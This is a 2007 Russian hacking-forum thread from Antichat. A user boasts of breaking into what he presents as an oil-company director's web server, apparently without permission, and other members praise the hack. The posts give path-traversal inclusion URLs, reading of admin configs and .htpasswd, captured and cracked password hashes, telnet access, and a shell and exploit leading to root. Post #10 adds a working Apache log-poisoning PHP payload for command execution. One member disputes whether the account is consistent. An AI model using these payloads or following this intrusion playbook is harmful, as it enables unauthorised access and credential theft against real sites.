ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Интересный взлом!
  #1  
Старый 27.08.2007, 20:40
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
Wink Интересный взлом!

Неделю таму назад попался сайт с локальным инклудом в cgi сценарии. Казалось на этом при раскладе ,что можно читать passwd и даже httpd.conf , можно забить, но я не стал.

Оказалось ,что я не просто могу читать , но и перемещаться по директориям на сервере :

Код:
http://xost.com/view.cgi?page=../../../../../../../../../../../../../home/
Поехали дальше. Тут сразу приходит в голову сделать инклуд через логи родного апача, но это при хорошом раскладе.Это как я сказал не получилось.

Не много забив на этот ресурс, я опять вернулся к нему!
Изучив конфиг апача стало ясно , что есть субдомен.
Субдомен оказался домашней страницей Василия Пупкина (директор нефтяного комплекса)! И тут я увидел линк на его форум, попал на Yabb. Мои дальнейшие мысли ,конечно же прочитать через ранее найденный инклуд конфиг админа , где находиться логин и пароль от админки форума.

Код:
http://xost.com/view.cgi?page=../../../../../../../../../../../../../Basili/forum/Members/admin.vars
Хм пароль попался в страном виде:

Код:
'password',"ISMvKXpXpadDiUoOSoAfww"
Слив себе на винт исходники форума, все стало понятно! Запускаем PasswordsPro -> жмем F7 -> вставляем ранее полученный хеш -> и кликаем Base64-Нех , получаем чистый MD5.

Пароль получен, но как я понял , ребята из конторы Yabb форума, хорошо все придумали! Попробовал записать свой шелл в папку атача форума, но увы шелл не выполнился как php(этого я и ожидал).!!!

Опять забив на день, я вернулся к изучению сервера.
Не хотелось забивать на форум, слив на винт все varsы .юзверей форума и переведя их в md5 , кинул на перебор.

Сам этим временем загрузил на своем шелле nmap.
Стандартный набор открытых портов, но одно "23" порт был открыт. Прителнетившись к 23 , получил предложение ввести логин :admin и меня попросили пройтись лесом-
Начал опять смотреть директории на сервере и нашел админку в домашней директории сайта в котором нашел локальный инклуд. Написана все было на php , от сюда сразу идея почитать конфиг данной админки, тут как всегда попался config.php но внутри вместо dbuser и dbpass , я нашел две строчки $login и $pwd

Код:
$login:'ceaf032b15f379cc6413be8bd335259f'
$pwd:'d474541e0992804e4b9743a7b9d0eff7'
После перебора получил и логин и пароль (очень сложные).

Зашел в админку и у меня на лице появилась улыбка
Вкладка Upload Images, быстрым кликом я попал в раздел загрузки , но опять облом. Загрузка осуществляется через ftp сценарий , тут думаю все понятно ,надо знать логин и пасс к ftp. Ж( Пробую приконектиться к 21 ,но опять облом , фильтруется.
Да , думаю 23 открыт для всех , а вот 21 только для своих( хотя 23 наиболее не безопасное решение для админа)!!! В админки я нашел ссылку на phpinfo , по нему там стояла линуха с ядром 2.4 , при хорошом раскладе звезд на небе рут гарантирован, но читаем дальше.

Опять поиски по серверу и удача !!!!!!!!!!! Попался .htpasswd, а внутри много вкусного, акки , но не понятно к чему. Новая идея осенила мою голову, telnet host.com 23 !!
И ввел первый логин из htaccess и тут уже я не пошел лесом, а мне задали вопрос , введите номер рабочего места для данного логина Пример:1312.4235.11. еБ . ТОП ТОП., не одно так другое. Но опять выход был найден в ранее найденой админки , на главной страницы красовались email админов и редакторов + 1312.4235.11 вот примерно такие наборы чисел.
Опять telnet и уже не лес , а солнечное поле!

Далее был залит шелл, затем сплоит и root!/////
ВСЕМ БИЗНЕСМЕНАМ ПРИВЕДДДД!

Последний раз редактировалось fly; 27.08.2007 в 20:50..
 
Ответить с цитированием

  #2  
Старый 27.08.2007, 21:42
Аватар для a1ex
a1ex
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406

Репутация: 271


Отправить сообщение для a1ex с помощью ICQ Отправить сообщение для a1ex с помощью AIM Отправить сообщение для a1ex с помощью MSN Отправить сообщение для a1ex с помощью Yahoo
По умолчанию

Улыбнуло
 
Ответить с цитированием

  #3  
Старый 27.08.2007, 22:05
Аватар для dimon222
dimon222
Участник форума
Регистрация: 01.06.2007
Сообщений: 165
Провел на форуме:
765850

Репутация: 260
Отправить сообщение для dimon222 с помощью ICQ
По умолчанию

Тоже улыбнуло.
 
Ответить с цитированием

  #4  
Старый 27.08.2007, 22:11
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

чет меня не улыбает =/
Может просто я даун, но нахрен было нужно брутить, тебе всетаки понадобились эти логин и пасс?
 
Ответить с цитированием

  #5  
Старый 27.08.2007, 22:15
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

Какие!?
 
Ответить с цитированием

  #6  
Старый 28.08.2007, 01:48
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

$login:'ceaf032b15f379cc6413be8bd335259f'
$pwd:'d474541e0992804e4b9743a7b9d0eff7'
 
Ответить с цитированием

  #7  
Старый 28.08.2007, 02:19
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

Для админки эта связка, не от форума , а от админки на сайте ,где был найдет локальный инклуд!
 
Ответить с цитированием

  #8  
Старый 29.08.2007, 18:20
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

И правда красивый взлом, молодец =)
 
Ответить с цитированием

  #9  
Старый 30.08.2007, 03:57
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

а мне кажется он не понимает про что пишет:
Цитата:
Неделю таму назад попался сайт с локальным инклудом в cgi сценарии.
Цитата:
Тут сразу приходит в голову сделать инклуд через логи родного апача
Цитата:
от сюда сразу идея почитать конфиг данной админки, тут как всегда попался config.php
Цитата:
Загрузка осуществляется через ftp сценарий , тут думаю все понятно ,надо знать логин и пасс к ftp. Ж( Пробую приконектиться к 21
ну я думаю кому надо, тот поймет...

если кто не понял, поясню: если он хотел проинклюдить логи апача, то как он смог прочитать config.php... и это только пример противоречивости
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 30.08.2007 в 04:01..
 
Ответить с цитированием

  #10  
Старый 30.08.2007, 14:53
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию

Ты себя пойми для начало. Цитаты ты собрал с разных частей рассказа!!!
А вот и ответ на твой вопрос--> Инклуд в логах: http://xost.com/view.cgi?page=<?passthru($_GET[cmd]);?>,даная строчка записывается или в access_log ибо в errors_log, затем http://xost.com/view.cgi?page=../../../../../../../../../../../../usr/local/apache/logs/access_log?cmd=id
http://xost.com/view.cgi?page=../../../../../../../../../../../../usr/local/apache/logs/errors_log?cmd=id
Тут вроде все понятно с ходом моей мысли.

Код:
если кто не понял, поясню: если он хотел проинклюдить логи апача, то как он смог прочитать config.php... и это только пример противоречивости
Оказалось ,что я не просто могу читать , но и перемещаться по директориям на сервере !
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
С чего начать взлом чата erochat.ru ? Newman Чаты 10 22.12.2004 19:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ